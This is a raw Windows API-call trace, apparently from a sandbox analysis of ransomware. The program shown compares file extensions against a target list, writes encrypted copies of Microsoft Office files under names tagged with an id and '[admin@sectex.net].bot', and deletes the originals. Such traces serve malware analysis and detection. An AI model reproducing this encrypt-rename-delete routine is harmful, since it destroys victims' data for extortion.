	[0150.486] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0150.486] lstrlenW (lpString=".pdf") returned 4
	[0150.486] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0150.486] lstrlenW (lpString=".xls") returned 4
	[0150.486] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0150.487] lstrlenW (lpString=".xlsx") returned 5
	[0150.487] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0150.487] lstrlenW (lpString=".ppt") returned 4
	[0150.487] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0150.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.487] lstrlenW (lpString=".zip") returned 4
	[0150.487] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0150.487] lstrlenW (lpString=".rar") returned 4
	[0150.487] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0150.487] lstrlenW (lpString=".bz2") returned 4
	[0150.487] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0150.487] lstrlenW (lpString=".7z") returned 3
	[0150.487] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0150.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.487] lstrlenW (lpString=".dbf") returned 4
	[0150.487] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0150.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.487] lstrlenW (lpString=".1cd") returned 4
	[0150.487] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0150.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.487] lstrlenW (lpString=".jpg") returned 4
	[0150.487] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0150.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.487] lstrlenW (lpString=".doc") returned 4
	[0150.487] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0150.487] lstrlenW (lpString=".docx") returned 5
	[0150.487] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0150.487] lstrlenW (lpString=".pdf") returned 4
	[0150.487] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0150.487] lstrlenW (lpString=".xls") returned 4
	[0150.488] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0150.488] lstrlenW (lpString=".xlsx") returned 5
	[0150.488] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0150.488] lstrlenW (lpString=".ppt") returned 4
	[0150.488] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0150.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.488] lstrlenW (lpString=".zip") returned 4
	[0150.488] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0150.488] lstrlenW (lpString=".rar") returned 4
	[0150.488] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0150.488] lstrlenW (lpString=".bz2") returned 4
	[0150.488] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0150.488] lstrlenW (lpString=".7z") returned 3
	[0150.488] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0150.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.488] lstrlenW (lpString=".dbf") returned 4
	[0150.488] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0150.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.488] lstrlenW (lpString=".1cd") returned 4
	[0150.488] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0150.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.488] lstrlenW (lpString=".jpg") returned 4
	[0150.488] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0150.488] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0150.488] lstrlenW (lpString="SHAPNUM.VSL") returned 11
	[0150.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.489] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=42352) returned 1
	[0150.489] CloseHandle (hObject=0x3d0) returned 1
	[0150.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl")) returned 0x20
	[0150.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.489] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.490] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.490] GetLastError () returned 0x0
	[0150.490] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xa570, lpOverlapped=0x0) returned 1
	[0150.493] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xa580, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xa580, lpOverlapped=0x0) returned 1
	[0150.494] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.494] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0150.494] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.494] CloseHandle (hObject=0x1b8) returned 1
	[0150.494] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.495] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.498] CloseHandle (hObject=0x3d0) returned 1
	[0150.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl")) returned 1
	[0150.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.499] lstrlenW (lpString=".doc") returned 4
	[0150.499] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.499] lstrlenW (lpString=".docx") returned 5
	[0150.499] lstrcmpiW (lpString1=".docx", lpString2="M.VSL") returned -1
	[0150.499] lstrlenW (lpString=".pdf") returned 4
	[0150.499] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.499] lstrlenW (lpString=".xls") returned 4
	[0150.500] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.500] lstrlenW (lpString=".xlsx") returned 5
	[0150.500] lstrcmpiW (lpString1=".xlsx", lpString2="M.VSL") returned -1
	[0150.500] lstrlenW (lpString=".ppt") returned 4
	[0150.500] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.500] lstrlenW (lpString=".zip") returned 4
	[0150.500] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.500] lstrlenW (lpString=".rar") returned 4
	[0150.500] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.500] lstrlenW (lpString=".bz2") returned 4
	[0150.500] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.500] lstrlenW (lpString=".7z") returned 3
	[0150.500] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.500] lstrlenW (lpString=".dbf") returned 4
	[0150.500] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.500] lstrlenW (lpString=".1cd") returned 4
	[0150.500] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.500] lstrlenW (lpString=".jpg") returned 4
	[0150.500] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.501] lstrlenW (lpString=".doc") returned 4
	[0150.501] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString=".docx") returned 5
	[0150.501] lstrcmpiW (lpString1=".docx", lpString2="M.VSL") returned -1
	[0150.501] lstrlenW (lpString=".pdf") returned 4
	[0150.501] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString=".xls") returned 4
	[0150.501] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.501] lstrlenW (lpString=".xlsx") returned 5
	[0150.501] lstrcmpiW (lpString1=".xlsx", lpString2="M.VSL") returned -1
	[0150.501] lstrlenW (lpString=".ppt") returned 4
	[0150.501] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.501] lstrlenW (lpString=".zip") returned 4
	[0150.501] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.501] lstrlenW (lpString=".rar") returned 4
	[0150.501] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString=".bz2") returned 4
	[0150.501] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString=".7z") returned 3
	[0150.501] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.501] lstrlenW (lpString=".dbf") returned 4
	[0150.501] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.501] lstrlenW (lpString=".1cd") returned 4
	[0150.501] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL") returned 59
	[0150.501] lstrlenW (lpString=".jpg") returned 4
	[0150.501] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.502] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.502] lstrlenW (lpString="SLINTL.DLL") returned 10
	[0150.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\slintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.502] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=9088) returned 1
	[0150.502] CloseHandle (hObject=0x3d0) returned 1
	[0150.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\slintl.dll")) returned 0x20
	[0150.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\slintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\slintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0150.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.503] lstrlenW (lpString=".doc") returned 4
	[0150.503] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.503] lstrlenW (lpString=".docx") returned 5
	[0150.503] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0150.503] lstrlenW (lpString=".pdf") returned 4
	[0150.503] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.503] lstrlenW (lpString=".xls") returned 4
	[0150.503] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.503] lstrlenW (lpString=".xlsx") returned 5
	[0150.503] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0150.503] lstrlenW (lpString=".ppt") returned 4
	[0150.503] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.503] lstrlenW (lpString=".zip") returned 4
	[0150.503] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.503] lstrlenW (lpString=".rar") returned 4
	[0150.503] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.503] lstrlenW (lpString=".bz2") returned 4
	[0150.503] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.503] lstrlenW (lpString=".7z") returned 3
	[0150.503] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.503] lstrlenW (lpString=".dbf") returned 4
	[0150.503] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.503] lstrlenW (lpString=".1cd") returned 4
	[0150.503] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.504] lstrlenW (lpString=".jpg") returned 4
	[0150.504] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.504] lstrlenW (lpString=".doc") returned 4
	[0150.504] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString=".docx") returned 5
	[0150.504] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0150.504] lstrlenW (lpString=".pdf") returned 4
	[0150.504] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString=".xls") returned 4
	[0150.504] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString=".xlsx") returned 5
	[0150.504] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0150.504] lstrlenW (lpString=".ppt") returned 4
	[0150.504] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.504] lstrlenW (lpString=".zip") returned 4
	[0150.504] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString=".rar") returned 4
	[0150.504] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.504] lstrlenW (lpString=".bz2") returned 4
	[0150.504] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.504] lstrlenW (lpString=".7z") returned 3
	[0150.504] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.504] lstrlenW (lpString=".dbf") returned 4
	[0150.504] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.505] lstrlenW (lpString=".1cd") returned 4
	[0150.505] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SLINTL.DLL") returned 58
	[0150.505] lstrlenW (lpString=".jpg") returned 4
	[0150.505] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.505] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0150.505] lstrlenW (lpString="SMIGRATE.VSL") returned 12
	[0150.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.506] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=38768) returned 1
	[0150.506] CloseHandle (hObject=0x3d0) returned 1
	[0150.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl")) returned 0x20
	[0150.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.507] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.507] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.507] GetLastError () returned 0x0
	[0150.507] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x9770, lpOverlapped=0x0) returned 1
	[0150.511] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x9780, lpOverlapped=0x0) returned 1
	[0150.512] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.512] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.512] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.512] CloseHandle (hObject=0x1b8) returned 1
	[0150.512] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.512] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.515] CloseHandle (hObject=0x3d0) returned 1
	[0150.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.515] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl")) returned 1
	[0150.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.516] lstrlenW (lpString=".doc") returned 4
	[0150.516] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.516] lstrlenW (lpString=".docx") returned 5
	[0150.516] lstrcmpiW (lpString1=".docx", lpString2="E.VSL") returned -1
	[0150.516] lstrlenW (lpString=".pdf") returned 4
	[0150.516] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.516] lstrlenW (lpString=".xls") returned 4
	[0150.516] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.516] lstrlenW (lpString=".xlsx") returned 5
	[0150.516] lstrcmpiW (lpString1=".xlsx", lpString2="E.VSL") returned -1
	[0150.516] lstrlenW (lpString=".ppt") returned 4
	[0150.516] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.517] lstrlenW (lpString=".zip") returned 4
	[0150.517] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.517] lstrlenW (lpString=".rar") returned 4
	[0150.517] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString=".bz2") returned 4
	[0150.517] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString=".7z") returned 3
	[0150.517] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.517] lstrlenW (lpString=".dbf") returned 4
	[0150.517] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.517] lstrlenW (lpString=".1cd") returned 4
	[0150.517] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.517] lstrlenW (lpString=".jpg") returned 4
	[0150.517] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.517] lstrlenW (lpString=".doc") returned 4
	[0150.517] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString=".docx") returned 5
	[0150.517] lstrcmpiW (lpString1=".docx", lpString2="E.VSL") returned -1
	[0150.517] lstrlenW (lpString=".pdf") returned 4
	[0150.517] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.517] lstrlenW (lpString=".xls") returned 4
	[0150.517] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.517] lstrlenW (lpString=".xlsx") returned 5
	[0150.517] lstrcmpiW (lpString1=".xlsx", lpString2="E.VSL") returned -1
	[0150.517] lstrlenW (lpString=".ppt") returned 4
	[0150.518] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.518] lstrlenW (lpString=".zip") returned 4
	[0150.518] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.518] lstrlenW (lpString=".rar") returned 4
	[0150.518] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.518] lstrlenW (lpString=".bz2") returned 4
	[0150.518] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.518] lstrlenW (lpString=".7z") returned 3
	[0150.518] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
